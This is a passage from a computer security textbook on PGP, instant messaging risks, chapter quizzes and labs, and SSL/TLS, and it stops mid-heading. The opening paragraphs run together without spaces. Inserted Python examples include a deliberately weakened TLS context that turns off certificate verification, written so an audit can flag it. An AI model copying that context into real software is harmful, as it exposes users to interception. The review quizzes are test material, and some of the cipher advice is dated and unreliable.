software.Thisiswhereauserstoresnotonlylocalkeys,butalsoanykeysthatwerereceivedfromotherusers.AfreekeyserverisavailableforstoringPGPpublickeys.PGPcangenerateitsownkeysusingeither
Diffie-HellmanorRSA,anditcanthentransmitthepublickeystothePGPLDAPserversootherPGPuserscansearchforandlocateyourpublickeytocommunicatewithyou.Thiskeyserverisconvenient,aseachpersonusingPGPforcommunicationsdoesnothavetoimplementaservertohandlekeymanagement.Fortheactualencryptionofthee-mailcontentitself,PGPsupportsInternationalDataEncryptionAlgorithm(IDEA),3DES,andCarlisleAdamsandStaffordTavares(CAST)forsymmetricencryption.PGPprovidesprettygoodsecurityagainstbrute-forceattacksbyusinga3DESkeylengthof168bits,anIDEAkeylengthof128bits,andaCASTkeylengthof128bits.Allofthesealgorithmsaredifficulttobrute-forcewithexistinghardware,requiringwelloveramillionyearstobreakthecode.Whilethisisnotapromiseoffuturesecurityagainstbrute-forceattacks,thesecurityisreasonabletoday.
•Figure16.9PGPkeymanagement
PGPhasplug-insformanypopulare-mailprograms,includingOutlookandMozilla’sThunderbird.Theseplug-inshandletheencryptionanddecryptionbehindthescenes,andallthattheusermustdoisentertheencryptionkey’spassphrasetoensurethattheyaretheownerofthekey.InFigure16.10,youcanseethestringofencryptedtextthatmakesuptheMIMEattachment.Thistextincludestheencryptedcontentofthemessageandtheencryptedsymmetrickey.Youcanalsoseethattheprogramdoesnotdecryptthemessageuponreceipt;itwaitsuntilinstructedtodecryptit.PGPalsostoresencryptedmessagesintheencryptedformat,asdoesS/MIME.Thisisimportant,sinceitprovidesend-to-endsecurityforthemessage.
•Figure16.10DecodingaPGP-encodedmessage
LikeS/MIME,PGPisnotproblem-free.Youmustbediligentaboutkeepingthesoftwareuptodateandfullypatched,becausevulnerabilitiesareoccasionallyfound.Forexample,abufferoverflowwasfoundinthewayPGPwashandledinOutlook,causingtheoverwritingofheapmemoryandleadingtopossiblemaliciouscodeexecution.ThereisalsoalotofdiscussionaboutthewayPGPhandleskeyrecovery,orkeyescrow.PGPuseswhat’scalledanAdditionalDecryptionKey(ADK),whichisbasicallyanadditionalpublickeystackedupontheoriginalpublickey.AnADK,intheory,wouldgivetheproperorganizationaprivatekeythatwouldbeusedtoretrievethesecretmessages.Inpractice,theADKisnotalwayscontrolledbyaproperlyauthorizedorganization,andthedangerexistsforsomeonetoaddanADKandthendistributeittotheworld.Thiscreatesasituationinwhichotheruserswillbesendingmessagesthattheybelievecanbereadonlybythefirstparty,butthatcanactuallybereadbythethirdpartywhomodifiedthekey.Thesearejustexamplesofthecurrentvulnerabilitiesintheproduct,showingthatPGPisjustatool,nottheultimateanswertosecurity.
InstantMessagingInstantmessaging(IM)isanothertechnologythathasseenwidespreadacceptanceinrecentyears.WiththegrowthoftheInternetpullingcustomersawayfromAOL,oneofthelargestdial-upprovidersintheUnitedStates,thecompanyhadtolookatnewwaysofprovidingcontent.ItstartedAOLInstantMessenger(AIM),whichwasconceivedasawaytofindpeopleoflikeinterestsonline,anditwasmodeledafterearlierchatprograms.WithGUIfeaturesandenhancedeaseofuse,itquicklybecamepopularenoughforAOLtoreleasetoregularusersoftheInternet.Alongwithseveralcompetingprograms,AIMwasfeedingthetremendousgrowthoftheinstantmessagingsegment.Theprogramshadtoappealtoawidevarietyofusers,soeaseofuse
wasparamount,andsecuritywasnotapriority.NowthatpeopleareaccustomedtoIMapplications,theyseethebenefitofusingthemnotonlyforpersonalchattingontheInternet,butalsoforlegitimatebusinessuse.Whenpeopleinstalltheseapplications,theyunwittinglyexposethecorporatenetworktosecuritybreachesthroughmanyofthesamemalicioussoftwareproblemsase-mail.InstantmessagestraversetheInternetinplaintextandalsocrossthird-partyservers—beitYahoo,Skype,Google,orAOL.
IMprogramsaredesignedtoattachtoaserver,oranetworkofservers,andallowyoutotalkwithotherpeopleonthesamenetworkofserversinnearrealtime.Thenatureofthistypeofcommunicationopensseveralholesinasystem’ssecurity.First,theprogramhastoattachtoaserver,typicallyannouncingtheIPaddressoftheoriginatingclient.Thisisnotaprobleminmostapplications,butIMidentifiesaspecificuserassociated
withtheIPaddress,makingattacksmorelikely.Alsoassociatedwiththisfactisthatforotheruserstobeabletosendyoumessages,theprogramisforcedtoannounceyourpresenceontheserver.SonowauserisdisplayingthathisorhercomputerisonandispossiblybroadcastingthesourceIPaddresstoanyonewhoislooking.Thisproblemiscompoundedbythetendencyforpeopletoruntheseprogramsinthebackgroundsothattheydon’tmissanymessages.PopularIMclientswerenotimplementedwithsecurityinmind.All
supportsendingfilesasattachments,fewcurrentlysupportencryption,andcurrentlynonehaveavirusscannerbuiltintothefile-sharingutility.
Filesharinginanyformmustbeacarefullyhandledapplicationtopreventthespreadofvirusesandothermaliciouscode.Chatprogramsproducesecurityrisks,becausethesharingisdoneadhocbetweenendusers,administratorshavenocontroloverthequalityofthefilesbeingsent,andthereisnomonitoringoftheoriginalsourcesofthosefiles.The
onlyauthenticationforthefilesisthehumaninteractionbetweenthetwousersinquestion.ThiskindofvulnerabilitycoupledwithasocialengineeringattackcanproducedramaticenoughresultsthattheCERTCoordinationCenter(CERT/CC)wascompelledtoissueanincidentnote(CERTIncidentNoteIN-2002-03:SocialEngineeringAttacksviaIRCandInstantMessaging).Thispersonaltypeofauthenticationwasabused,trickingpeopleintodownloadingandexecutingbackdoororTrojanhorseprograms.Ausercanalsobepersuadedautonomouslytodownloadandrunafile
viaIM.Severalwormsexistthatattempt,viaIM,togetuserstodownloadandrunthepayload.W32.pipelineusesAIMtoinstallarootkit.Goner,runningviaICQ,anotherIMprogram,asksuserstodownloadascreensaver.Choke,spreadingviaMSN/WindowsLiveMessenger,attemptstogetuserstodownloadagame;ifthegameisdownloaded,thewormattemptstospreadtoanyusertheinfecteduserchatswith.Thesewormsandothersalldependonuserinteractiontorunthepayload.Thisfile-sharingmechanismbypassesalltheserver-sidevirusprotectionthatispartofmostorganizations’e-mailinfrastructure.Thispushesmoreoftheresponsibilityformalwareprotectionontothelocalusers’antivirussystem.Thiscanbeproblematicforuserswhodonotregularlyupdatetheirsystemsorwhofailtoperformregularantivirusscans.
TechTip
TrillianAnIMclientthatsupportsencryptionaswellasallthepopularnetworkslikeAIM,Yahoo,andSkypeisTrillian.Trillianisavailableatwww.trillian.im.
One of the largest problems with IM programs is the lack of support for encryption. AIM, ICQ, Skype, and Yahoo Messenger all currently do not natively support encryption of the text messages traveling between users. However, some third-party programs will add encryption as a plug-in. The lack of encryption was not a significant concern while these IM programs were still used primarily for personal communication, but with businesses moving to adopt the systems, people are not aware of the infrastructure difference between IM and e-mail. Intracompany e-mail never leaves the company’s network, but an intracompany instant message typically will do so unless the organization purchases a product and operates an internal IM server. This can and does expose large amounts of confidential business information to anyone who is physically in a spot to monitor and has the desire to capture the traffic. If you think about how often client information is sent via e-mail between two people at a company, you start to see the danger that sending it via IM creates.
IM is an application that is typically installed by the end user, without the knowledge of the administrator. These types of rogue applications have always been a danger to a network’s security, but administrators have typically been able to control them by eliminating the applications’ ports through the firewall. The protocols used for these chat applications have default TCP ports: AIM uses 5190, Jabber uses 5222 and 5269, Yahoo Messenger uses 5050, and MSN/Windows Live Messenger uses 1863. Some IM applications have been programmed for use as rogue apps. In the event that they can’t reach a server on the default ports, they begin to scan all ports looking for one that is allowed out of the firewall. As these applications can connect on any port, including common ones such as Telnet port 23 and HTTP port 80, they are very hard to control. These types of security risks go above and beyond the routine security holes generated in IM software that arise as in any other piece of software, through coding errors.
Tech Tip
Securing IM
Tips to help secure corporate IM:
Run a corporate IM server
Avoid file transfers
Use encryption
Modern Instant Messaging Systems
Instant messaging is an application that can increase productivity by saving communication time, but it’s not without risks. The protocol sends messages in plaintext and thus fails to preserve their confidentiality. It also allows for sharing of files between clients, allowing a backdoor access method for files. There are some methods to minimize security risks, but more development efforts are required before IM is ready to be implemented in a secure fashion. The best ways in which to protect yourself on an IM network are similar to those for almost all Internet applications: avoid communication with unknown persons, avoid running any program you are unsure of, and do not write anything you wouldn’t want posted with your name on it.
Instant messaging also plays a role in today’s social media–driven world. There are many very popular “messaging systems” in popular use today, including Snapchat, Instagram, Jabber, Tumblr, WhatsApp, and more. These are instant sharing systems that allow user bases to share files, pictures, and videos between users. Each of these systems has large numbers of users and literally billions of transferred items every year. As the social aspect of the Web grows, so do the instant sharing systems connecting users in social webs. Apple has its own messaging service, as does Android, and apps exist for a wide range of different “messaging” systems. Any list of messaging apps is one that will become outdated rather rapidly, but at the time this book goes to press the list would include the following:
LINE
Viber
WhatsApp (now part of Facebook)
Facebook Messenger
Snapchat
Kik
Tango
Jabber
Tumblr
The main security threat on most of these is information disclosure. As they can be used from mobile devices outside of an enterprise network, there is the possibility for information to be captured and released across these platforms. For this reason, one of the security policies of high-security facilities is to not allow personal devices.
Chapter 16 Review
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about e-mail and IM security.
Describe security issues associated with e-mail
Malicious code is code that performs something harmful to the computer it runs on. Malicious code is often sent through e-mail.
Viruses are pieces of malicious code that require user action to spread.
Trojan programs deceive the user into thinking that a program is something innocuous, when it is actually a piece of malicious code.
Worms are pieces of malicious code that use automated methods to spread.
Spam, or unsolicited commercial e-mail, is e-mail that is sent to you without your requesting it, attempting to sell you something. It is the electronic equivalent of a telemarketing call.
Hoax e-mails are e-mails that travel from user to user because of the compelling story contained in them.
Implement security practices for e-mail
Protecting your e-mail system from virus code requires several measures:
Don’t execute any attachment from an unknown source.
Use antivirus programs that run on the server to filter all e-mails.
Use client-side antivirus programs to catch any viruses that might come from web-based e-mail accounts.
Keeping all software up to date helps to prevent worm propagation.
Server-side filtering software and the application of spam blackhole lists help limit the amount of unsolicited e-mail.
E-mail encryption is a great way to protect the privacy of communication since e-mail is a cleartext medium.
PGP, or Pretty Good Privacy, is a good specific application for e-mail encryption.
S/MIME, or Secure/Multipurpose Internet Mail Extension, is the e-mail protocol that allows encryption applications to work.
Antivirus software is important to protect against malware.
Detail the security issues of instant messaging protocols
AOL Instant Messenger, ICQ, and Skype are all different versions of instant messaging programs.
The most popular IM programs all send messages in the clear, without a native encryption built into the default clients.
All the IM clients need to attach to a server to communicate. Therefore, when attached to the server, they announce the source IP of a particular user.
Instant messaging can also transfer files. This activity typically bypasses any security built into the network, especially mail server virus protections.
Key Terms
AOL Instant Messenger (AIM)
botnet
DomainKeys Identified Mail (DKIM)
e-mail
e-mail hoax
encryption
instant messaging (IM)
mail delivery agent (MDA)
mail relaying
mail transfer agent (MTA)
mail user agent (MUA)
Multipurpose Internet Mail Extensions (MIME)
open relay
Pretty Good Privacy (PGP)
Real-time Blackhole List (RBL)
Secure/Multipurpose Internet Mail Extensions (S/MIME)
Sender ID Framework (SIDF)
Sender Policy Framework (SPF)
Simple Mail Transfer Protocol (SMTP)
spam
unsolicited commercial e-mail
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. Spam is the popular term for _______________.
2. _______________ is a method to detect e-mail spoofing.
3. A large source of spam is zombie computers that are part of a(n) _______________.
4. ________ is the protocol used to attach attachments to an e-mail.
5. A(n) _______________ is a compilation of servers that are blocked because they have been known to send spam.
6. _______________ is one of the most popular chat programs.
7. _______________ is a protocol for verifying e-mail addresses against IP addresses to reduce spam.
8. A(n) _______________ is a false e-mail that tells a compelling story, and typically prompts the user to forward it to other users.
9. _______________ can have the same virus risks as e-mail.
10. The most prevalent protocol that e-mail is sent by is _______________.
Multiple-Choice Quiz
1. What is one of the biggest reasons spam is prevalent today?
A. Criminals use zombie botnets.
B. Regular mail is too slow.
C. Spam is popular among recipients.
D. Spam is sent from the government.
2. What is spam?
A. Unsolicited commercial e-mail
B. A Usenet archive
C. A computer virus
D. An encryption algorithm
3. Why is an open e-mail relay bad?
A. It allows anyone to remotely control the server.
B. It makes the e-mail server reboot once a day.
C. No e-mail will go through.
D. It will allow anyone to send spam through the server.
4. What makes e-mail hoaxes popular enough to keep the same story floating around for years?
A. They are written by award-winning authors.
B. The story prompts action on the reader’s part.
C. The story will grant the user good luck only if he or she forwards it on.
D. The hoax e-mail forwards itself.
5. What is greylisting?
A. E-mail messages are temporarily rejected so that the sender is forced to resend.
B. E-mail messages are run through a strong set of filters before delivery.
C. E-mail messages are sent through special secure servers.
D. E-mail is sent directly from the local host to the remote host, bypassing servers entirely.
6. Why are instant messaging protocols dangerous for file transfer?
A. They bypass server-based virus protections.
B. File sharing is never dangerous.
C. They allow everyone you chat with to view all your files.
D. You’ll end up receiving many spam files.
7. Why do PGP and S/MIME need public key cryptography?
A. Public keys are necessary to determine whether the e-mail is encrypted.
B. The public key is necessary to encrypt the symmetric key.
C. The public key unlocks the password to the e-mail.
D. The public key is useless and gives a false sense of privacy.
8. Why is HTML e-mail dangerous?
A. It can’t be read by some e-mail clients.
B. It sends the content of your e-mails to web pages.
C. It can allow launching of malicious code from the preview pane.
D. It is the only way spam can be sent.
9. If they are both text protocols, why is instant messaging traffic riskier than e-mail?
A. More viruses are coded for IM.
B. IM has no business purpose.
C. IM traffic has to travel outside of the organization to a server.
D. Emoticons.
10. What makes spam so popular as an advertising medium?
A. Its low cost per impression
B. Its high rate of return
C. Its ability to canvass multiple countries
D. Its quality of workmanship
Essay Quiz
1. How would you implement a successful spam-filtering policy?
2. Draft a memo describing malware risks to the common user and what the user can do to avoid infection.
Lab Projects
• Lab Project 16.1
Show that instant messaging is an insecure protocol. You will need a lab computer with Windows installed, an IM program, and a sniffer. Then do the following:
1. If you need to install an IM program, download AIM from www.aim.com.
2. Run the Installer program.
3. Generate a username and password and log in.
4. Start the sniffer program and set it to capture all traffic.
5. Start a chat session with a partner in the class.
6. Decode the sniff trace to view the cleartext messages of the chat.
• Lab Project 16.2
Find at least ten pieces of spam mail from any account, whether it be home, work, school, or something else. Using the e-mail headers, and any website that might provide information, attempt to trace the spam mail back to its original source.
You will need the following materials:
1. Collect the e-mails and view the e-mail header information in your e-mail program.
2. Find the “Received:” field in the headers and write down as many DNS names or IP addresses as you can. Also look for common details in the header elements of the different messages, such as the same e-mail servers and spammers.
3. Using the Internet, research the physical locations of the IP addresses.
4. Report the different locations from which your spam e-mail originated. What did you learn about tracing e-mail and spam?
Chapter 17 Web Components
Understanding the security risks associated with a web application is of critical importance to improving the security of the Web.
—AARON C. NEWMAN
In this chapter, you will learn how to
Describe the functioning of the SSL/TLS protocol suite
Explain web applications, plug-ins, and associated security issues
Describe secure file transfer options
Explain directory usage for data retrieval
Explain scripting and other Internet functions that present security concerns
Use cookies to maintain parameters between web pages
Examine web-based application security issues
The World Wide Web was invented by Tim Berners-Lee to give physicists a convenient method of exchanging information. What began in 1990 as a physics tool in the European Laboratory for Particle Physics (CERN, the acronym for the original French name) has grown into a complex system that is used by millions of computer users for tasks from e-commerce, to e-mail, chatting, games, and even the original intended use—file and information sharing. Before the Web, plenty of methods were used to perform these tasks, and they were already widespread in use. File Transfer Protocol (FTP) was used to move files, and Telnet allowed users access to other machines. What was missing was the common architecture brought by Berners-Lee: first, a common addressing scheme, built around the concept of a Uniform Resource Locator (URL); second, the concept of linking documents to other documents by URLs through the Hypertext Markup Language (HTML). Although these elements might seem minor, they formed a base that spread like wildfire. Berners-Lee developed two programs to demonstrate the usefulness of his vision: a web server to serve documents to users, and a web browser to retrieve documents for users. Both of these key elements contributed to the spread of this new technological innovation. The success of these components led to network after network being connected together in a “network of networks” known today as the Internet. Much of this interconnection was developed and funded through grants from the U.S. government to further technological and economic growth.
Current Web Components and Concerns
The usefulness of the Web is due not just to browsers, but also to web components that enable services for end users through their browser interfaces. These components use a wide range of protocols and services to deliver the desired content. From a security perspective, they offer users an easy-to-use, secure method of conducting data transfers over the Internet. Many protocols have been developed to deliver this content, although for most users, the browser handles the details. From a systems point of view, many security concerns have arisen, but they can be grouped into three main tasks:
Securing a server that delivers content to users over the Web
Securing the transport of information between users and servers over the Web
Securing the user’s computer from attack over a web connection
This chapter presents the components used on the Web to request and deliver information securely over the Internet.
Web Protocols
When two people communicate, several things must happen for the communication to be effective: they must use a language that both parties understand, and they must correctly use the language—that is, structure and syntax—to express their thoughts. The mode of communication is a separate entity entirely, for the previous statements are important in both spoken and written forms of communication. The same requirements are present with respect to computer communications, and they are addressed through protocols, agreed-upon sets of rules that allow different vendors to produce hardware and software that can interoperate with hardware and software developed by other vendors. Because of the worldwide nature of the Internet, protocols are very important and form the basis by which all the separate parts can work together. The specific instantiation of protocols is done through hardware and software components. The majority of this chapter concentrates on protocols related to the Internet as instantiated by software components.
Exam Tip: Know the ports! HTTPS (HTTP over SSL) uses TCP port 443. FTPS (FTP over SSL) uses TCP port 990 (control) and TCP port 989 (data in active mode). Hypertext Transfer Protocol (HTTP) uses TCP port 80, and File Transfer Protocol (FTP) uses TCP port 21 (control) and TCP port 20 (data in active mode).
Encryption (SSL and TLS)
Secure Sockets Layer (SSL) is a general-purpose protocol developed by Netscape for managing the encryption of information being transmitted over the Internet. It began as a competitive feature to drive sales of Netscape’s web server product, which could then send information securely to end users. This early vision of securing the transmission channel between the web server and the browser became an Internet standard. Today, SSL is almost ubiquitous with respect to e-commerce—all browsers support it as do web servers, and virtually all e-commerce websites use this method to protect sensitive financial information in transit between web servers and browsers.
The Internet Engineering Task Force (IETF) embraced SSL in 1996 through a series of RFCs and named the group of RFCs Transport Layer Security (TLS). Starting with SSL 3.0, in 1999, the IETF issued RFC 2246, “TLS Protocol Version 1.0,” followed by RFC 2712, which added Kerberos authentication, and then RFCs 2817 and 2818, which extended TLS to HTTP version 1.1 (HTTP/1.1). Although SSL has been through several versions, TLS begins with an equivalency to SSL 3.0, so today SSL and TLS are essentially the same, although not interchangeable. Recent attacks have left SSL vulnerable, and the consensus is that SSL is dead and TLS is the path forward, although everyone calls it SSL.
All versions of SSL have been shown to be vulnerable to breach. This means the entire SSL suite is now no longer considered secure. SSLv3 fell to the POODLE attack in 2014, leaving only TLS as a secure method. It is important that both clients and web servers as well as other applications be updated to only use TLS in the future.
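One practical form of that last sentence, added here as an example and not code from the book: auditing a Python ssl client context for the settings a TLS-only client needs. The hardened context pins the protocol floor at TLS 1.2 with the standard library’s minimum_version attribute; the deliberately weakened one is the kind that appears when a certificate error is “fixed” by switching verification off, which is exactly the gap the proxy attack later in this chapter relies on. The function names are my own.

```python
"""Audit of a Python ssl client context against what this section asks for:
nothing older than TLS 1.2, certificate verification on, hostname check on.
Added example, not code from the book; function names are mine."""
import ssl


def hardened_client_context():
    """create_default_context() already verifies certificates and hostnames;
    minimum_version adds an explicit protocol floor, so a server that only
    offers SSLv3/TLS 1.0/TLS 1.1 fails the handshake instead of downgrading."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def weakened_client_context():
    """The context that appears in scripts when a certificate error is 'fixed'
    by switching verification off.  Built here only so the audit has something
    to flag: with CERT_NONE a proxy presenting its own certificate is accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be cleared before verify_mode can drop
    ctx.verify_mode = ssl.CERT_NONE  # any certificate, from anyone, is accepted
    return ctx


def audit_context(ctx):
    """Return a list of findings; an empty list means the context passes."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol floor below TLS 1.2")
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("certificate hostname not checked against the URL")
    return findings


if __name__ == "__main__":
    for name, ctx in (("hardened", hardened_client_context()),
                      ("weakened", weakened_client_context())):
        print(name, audit_context(ctx) or "OK")
```

The same three checks apply to any TLS client library: protocol floor, chain verification, and hostname match. Dropping any one of them reopens either the downgrade or the impersonation path.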
SSL/TLS is a series of functions that exists in the OSI (Open System Interconnection) model between the application layer and the transport and network layers. The goal of TCP is to send an unauthenticated, error-free stream of information between two computers. SSL/TLS adds message integrity and authentication functionality to TCP through the use of cryptographic methods. Because cryptographic methods are an ever-evolving field, and because both parties must agree on an implementation method, SSL/TLS has embraced an open, extensible, and adaptable method to allow flexibility and strength. When two programs initiate an SSL/TLS connection, one of their first tasks is to compare available protocols and agree on an appropriate common cryptographic protocol for use in this particular communication. As SSL/TLS can use separate algorithms and methods for encryption, authentication, and data integrity, each of these is negotiated and determined depending upon need at the beginning of a communication. Browsers from Mozilla (Firefox) and Microsoft (Internet Explorer 11) allow fairly extensive SSL/TLS setup options (see Figure 17.1).
• Figure 17.1 IE11 security options
How SSL/TLS Works
SSL/TLS uses a wide range of cryptographic protocols. As of 2014, SSL is no longer considered secure, with SSLv3 falling victim to the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack. Throughout the book, all references to SSL should be considered to be for TLS only. It will take a generation or longer for the term SSL to fade in favor of TLS, if ever. The questions asked and answered are which protocol and which cryptographic algorithm will be used. For the client and server to communicate, both sides must agree on a commonly held protocol (SSL v1, v2, v3, or TLS v1, v1.1, v1.2). Commonly available cryptographic algorithms include Diffie-Hellman and RSA. The next step is to exchange certificates and keys as necessary to enable authentication.
Tech Tip
POODLE Attack
The Padding Oracle On Downgraded Legacy Encryption (POODLE) attack is a cryptographic attack using the padding of a message. Researchers at Google have discovered how to perform such an attack on TLS and SSL. The best method of preventing the attack on clients is through the disabling of SSLv3. Google and Mozilla have both removed SSL support from Chrome and Firefox, respectively. The POODLE attack on TLS involves an implementation error on the server side and can be corrected via patching.
Once authentication is established, the channel is secured with symmetric key cryptographic methods and hashes, typically RC4 or 3DES for symmetric key and MD5 or SHA-1 for the hash functions.
Tech Tip
TLS not SSL
Just know that TLS should be used in place of SSL for all instances. To use these protocols effectively between a client and a server, an agreement must be reached on which protocol to use, which is done via the TLS handshake process. The process begins with a client request for a secure connection and a server’s response. Although similar, SSL is no longer secure and TLS remains the only option.
Tech Tip
TLS Handshake
The following steps, depicted in the illustration below, establish a TLS secured channel (the SSL handshake is deprecated due to all versions of SSL being compromised):
1. The client sends to the server the client’s TLS version number, cipher settings, and session-specific data.
2. The server sends to the client the server’s TLS version number, cipher settings, session-specific data, and its own certificate. If the resource requested requires client authentication, the server requests the client’s certificate.
3. The client authenticates the server using the information it has received. If the server cannot be authenticated, the user is warned of the problem and informed that an encrypted and authenticated connection cannot be established.
4. The client encrypts a seed value with the server’s public key (from certificate—step 2) and sends it to the server. If the server requested client authentication, the client also sends the client certificate.
5. If the server requested client authentication, the server attempts to authenticate the client certificate. If the client certificate cannot be authenticated, the session ends.
6. The server uses its private key to decrypt the secret, and then performs a series of steps (which the client also performs) to generate a master secret. The required steps depend on the cryptographic method used for key exchange.
7. Both the client and the server use the master secret to generate the session key, which is a symmetric key used to encrypt and decrypt information exchanged during the TLS session.
8. The client sends a message informing the server that future messages from the client will be encrypted with the session key. It then sends a separate (encrypted) message indicating that the client portion of the handshake is finished.
9. The server sends a message informing the client that future messages from the server will be encrypted with the session key. It then sends a separate (encrypted) message indicating that the server portion of the handshake is finished.
10. The TLS handshake is now complete and the session can begin.
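The arithmetic behind steps 6 through 9, and the version choice of steps 1 and 2 that the “How SSL/TLS Works” paragraph describes, as an added example rather than code from the book: a Python walk-through of the TLS 1.2 key schedule from RFC 5246, computing the master secret, the per-direction session keys and the Finished verify_data on both sides from the same randoms. The certificate check (step 3) and the public-key encryption of the premaster secret (step 4) are stood in for by handing the premaster value straight to both ends so the block runs offline; the function names, the constructed transcript and the policy-floor constant are my assumptions.

```python
"""TLS 1.2 key schedule (RFC 5246 PRF with HMAC-SHA256) worked end to end.
Added example, not the book's code.  Steps 3 and 4 of the handshake are
simulated by passing the premaster secret directly; the derivation that both
endpoints perform is the real one."""
import hashlib
import hmac
import os

SSL_3_0, TLS_1_0, TLS_1_1, TLS_1_2 = 0x0300, 0x0301, 0x0302, 0x0303
MINIMUM_VERSION = TLS_1_2   # assumed policy floor: everything below is refused


def negotiate_version(client_highest, server_supported):
    """Step 2: the server picks the highest version both ends support.
    Refusing anything below the floor is what closes the POODLE downgrade.
    Returns None when no acceptable version exists (the handshake aborts)."""
    usable = [v for v in server_supported if MINIMUM_VERSION <= v <= client_highest]
    return max(usable) if usable else None


def p_sha256(secret, seed, length):
    """P_hash of RFC 5246 section 5: A(0) = seed, A(i) = HMAC(secret, A(i-1)),
    output = HMAC(secret, A(1)+seed) || HMAC(secret, A(2)+seed) || ..."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def prf(secret, label, seed, length):
    return p_sha256(secret, label + seed, length)


def derive_master_secret(premaster, client_random, server_random):
    """Step 6 (section 8.1): the 48-byte master secret from the premaster and both randoms."""
    return prf(premaster, b"master secret", client_random + server_random, 48)


def derive_keys(master, client_random, server_random, mac_len, key_len, iv_len):
    """Step 7 (section 6.3): split the key block into the per-direction keys.
    Note the randoms are concatenated server-first here, unlike step 6."""
    block = prf(master, b"key expansion", server_random + client_random,
                2 * (mac_len + key_len + iv_len))
    names = ["client_mac", "server_mac", "client_key", "server_key", "client_iv", "server_iv"]
    sizes = [mac_len, mac_len, key_len, key_len, iv_len, iv_len]
    keys, pos = {}, 0
    for name, size in zip(names, sizes):
        keys[name] = block[pos:pos + size]
        pos += size
    return keys


def finished_verify_data(master, label, transcript_hash):
    """Steps 8-9 (section 7.4.9): 12-byte verify_data proving this side holds the
    master secret and saw the same handshake messages as its peer."""
    return prf(master, label, transcript_hash, 12)


def simulate_handshake(client_random=None, server_random=None, premaster_tail=None):
    """Run both sides of the derivation; randoms default to fresh os.urandom values."""
    client_random = client_random or os.urandom(32)   # step 1: ClientHello.random
    server_random = server_random or os.urandom(32)   # step 2: ServerHello.random
    version = negotiate_version(TLS_1_2, [TLS_1_0, TLS_1_1, TLS_1_2])
    # Step 4: the premaster is 2 version bytes + 46 random bytes (section 7.4.7.1).
    premaster = version.to_bytes(2, "big") + (premaster_tail or os.urandom(46))
    # Step 6: each end computes the master secret on its own from the same inputs.
    client_master = derive_master_secret(premaster, client_random, server_random)
    server_master = derive_master_secret(premaster, client_random, server_random)
    # Step 7: TLS_RSA_WITH_AES_128_CBC_SHA256 sizes: 32-byte HMAC keys, 16-byte AES
    # keys, no key-block IV (TLS 1.2 CBC records carry an explicit per-record IV).
    keys = derive_keys(server_master, client_random, server_random, 32, 16, 0)
    # Steps 8-9: Finished over the hash of the messages exchanged so far
    # (a constructed stand-in transcript; real code hashes the actual messages).
    transcript = hashlib.sha256(b"ClientHello|ServerHello|Certificate|ClientKeyExchange").digest()
    return {
        "version": version,
        "client_master": client_master,
        "server_master": server_master,
        "keys": keys,
        "client_finished": finished_verify_data(client_master, b"client finished", transcript),
        "server_finished": finished_verify_data(server_master, b"server finished", transcript),
    }


if __name__ == "__main__":
    result = simulate_handshake()
    print("master secrets agree:", result["client_master"] == result["server_master"])
    print("client_key:", result["keys"]["client_key"].hex())
```

Two details worth noticing: the master secret depends on both randoms, so a replayed ClientKeyExchange against a fresh ServerHello yields different keys, and the Finished value depends on the transcript, so a peer that tampered with the negotiated version or cipher list would fail step 9.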
Exam Tip: Authentication was a one-way process for SSL v1 and v2, with only the server providing authentication. In SSL v3/TLS, mutual authentication of both client and server is possible. The exam will still have SSL!
At this point, the authenticity of the server and possibly the client has been established, and the channel is protected by encryption against eavesdropping. Each packet is encrypted using the symmetric key before transfer across the network, and then decrypted by the receiver. All of this work requires CPU time; hence, SSL/TLS connections require significantly more overhead than unprotected connections. Establishing connections is particularly time consuming, so even stateless web connections are held in a stateful fashion when secured via SSL/TLS, to avoid repeating the handshake process for each request. This makes some web server functionality more difficult, such as implementing web farms, and requires that either an SSL/TLS appliance be used before the web server to maintain state or the SSL/TLS state information be maintained in a directory-type service accessible by all of the web farm servers. Either method requires additional infrastructure and equipment. However, to enable secure e-commerce and other private data transactions over the Internet, this is a cost-effective method to establish a specific level of necessary security.
Tech Tip
Certificates
A certificate is merely a standard set of formatted data that represents the authenticity of the public key associated with the signer. If the issuer is a third party of stature, such as VeriSign or AT&T, you can rest your faith upon that authenticity. If the issuer is a large firm such as Microsoft, you can probably trust it if you are downloading its code. If the issuer is Bob’s Certificate Shack—well, unless you know Bob, you may have cause for concern. Certificates do not vouch for code security; they only say that the person or entity that is signing them is actually the person or entity they claim to be. Details of certificates and PKI elements to support their use are covered in Chapter 6, and you are encouraged to brush up on them if needed.
The use of certificates could present a lot of data and complication to a user. Fortunately, browsers have incorporated much of this desired functionality into a seamless operation. Once you have decided always to accept code from XYZ Corporation, subsequent certificate checks are handled by the browser. The ability to manipulate certificate settings is under the Options menus in both Internet Explorer (Figures 17.2 and 17.3) and Mozilla Firefox (Figures 17.4 and 17.5).
• Figure 17.2 Internet Explorer certificate management options
• Figure 17.3 Internet Explorer certificate store
• Figure 17.4 Firefox certificate options
• Figure 17.5 Firefox certificate store
Tech Tip
SSL/TLS Attacks
SSL/TLS is specifically designed to provide protection from man-in-the-middle attacks. By authenticating the server end of the connection, SSL/TLS was designed to prevent the initial hijacking of a session. By encrypting all of the conversations between the client and the server, SSL/TLS prevents eavesdropping. Even with all of this, however, SSL/TLS is not a complete security solution and can be defeated.
Once a communication is in the SSL/TLS channel, it is very difficult to defeat the SSL protocol. Before data enters the secured channel, however, defeat is possible. A Trojan program that copies keystrokes and echoes them to another TCP/IP address in parallel with the intended communication can defeat SSL/TLS, for example, provided that the Trojan program copies the data prior to SSL/TLS encapsulation. This type of attack has occurred and has been used to steal passwords and other sensitive material from users, performing the theft as the user actually types in the data.
Tech Tip
SSL/TLS Proxy Attack
